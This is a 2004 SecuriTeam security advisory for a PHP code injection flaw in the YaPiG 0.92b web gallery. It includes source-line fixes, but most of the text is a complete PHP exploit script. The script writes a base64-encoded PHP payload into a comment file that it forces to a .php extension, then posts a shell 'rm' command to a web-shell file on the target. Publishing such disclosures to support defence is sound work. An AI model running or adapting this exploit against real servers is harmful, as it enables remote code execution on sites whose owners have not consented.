The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
YaPiG add_comment.php PHP Code Injection
------------------------------------------------------------------------
SUMMARY
<http://yapig.sourceforge.net/> YaPiG is "a simple but powerful web album
very useful for publishing your image galleries". A vulnerability in the
product allows remote attackers to insert PHP code into the comments they
post, and at the same time control the extension of comment file being
created.
DETAILS
Vulnerable Systems:
* YaPiG version 0.92b
Immune Systems:
* YaPiG version 0.92b (Latest downloaded files appear to be immune to PHP
inclusion as it removes all <?PHP tags)
Exploit:
#!/usr/bin/php
<?
/*
YaPiG 0.92b add_coment PHP Insertion Proof of Concept
By aCiDBiTS acidbits@hotmail.com 07-August-2004
Description:
YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.
This Proof of Concept creates a php file that echoes a notice.
First it determines a valid photo directory where to create the
script.
Then creates a crafted comment saved in a new .php file. This comment
contains an encoded webshell. Once this .php file is opened, the code
contained creates test.php.
Usage (in my debian box):
php4 -q yapig_addc_poc.php "http://127.0.0.1/yapig-0.92b";
Vulnerability:
There is no user input sanization of some parameters in
add_comment.php
and functions.php.This allows to create a file with any extension, and
we can
insert any code in it. Version 0.92b is vulnerable, I haven't tested
older ones.
Workaround. Modify this lines of code:
add_comment.php
line 105:
$comments_file= $gid_dir . $gid . "_" . $phid;
Modify with:
$comments_file= $gid_dir . $gid . "_" . intval($phid);
functions.php, construct_comment_line()
line 699-700:
$linea=$linea . $data_array['mail'] . $SEPARATOR;
$linea=$linea . $data_array['web'] . $SEPARATOR;
Modify with:
$linea=$linea . htmlspecialchars($data_array['mail']) .
$SEPARATOR;
$linea=$linea . htmlspecialchars($data_array['web']) . $SEPARATOR;
*/
echo "+-------------------------------------------------------+\n| YaPiG
0.92b add_coment PHP Insertion Proof of Concept |\n| By aCiDBiTS
acidbits@hotmail.com 07-August-2004
|\n+-------------------------------------------------------+\n\n";
$websh="<?php
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgIC
AgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8
XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f);
?>";
if($argc<2) die("Usage: ".$argv[0]." URL_to_YaPiG_script\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';
echo "[+] Getting valid gid & photo path ... ";
$webc=get_web($host);
$temp=explode(";gid=",$webc);
$gid=intval($temp[1]);
$temp=explode("photos/",$webc);
$temp=explode("/",$temp[1]);
$path=$temp[0];
if( !$gid || !$path ) die( "Failed!\n\n");
echo "OK\n GID: $gid\n Path: ".$host."photos/".$path."/\n\n";
echo "[+] Creating notice script file ... ";
send_post( $host."add_comment.php?gid=".$gid."&phid=.php",
"tit=a&aut=a&mail=".urlencode($websh)."&web=&msg=a&date=&send=Send");
$webc=get_web( $host."photos/".$path."/".$gid."_.php" );
send_post( $host."photos/".$path."/acidwebshell.php", "c=".urlencode("rm
".$gid."_.php") );
echo "OK\n Now go to: ".$host."photos/".$path."/test.php";
die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\
//||\\\\\n\n");
function get_web($url)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}
function send_post($url,$data)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url );
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}
/* \ /
(Oo)
//||\\ */
?>
ADDITIONAL INFORMATION
The information has been provided by <mailto:acidbits@hotmail.com>
acidbits.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
